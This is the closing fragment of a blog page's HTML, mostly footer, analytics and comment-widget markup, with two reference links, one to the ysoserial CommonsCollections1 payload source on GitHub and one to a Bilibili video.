<p><a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java">https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java</a></p>
<p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1no4y1U7E1/?share_source=copy_web&vd_source=9cea2ee0a8625e7f0de0386824e9f605">https://www.bilibili.com/video/BV1no4y1U7E1/?share_source=copy_web&amp;vd_source=9cea2ee0a8625e7f0de0386824e9f605</a></p>
</blockquote>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p><h4>Copyright © 2020 | Author: Dawn Nine | Theme By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">Page Views: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">Unique Visitors: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="">
<input type="hidden" id="valine_appKey" value="">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
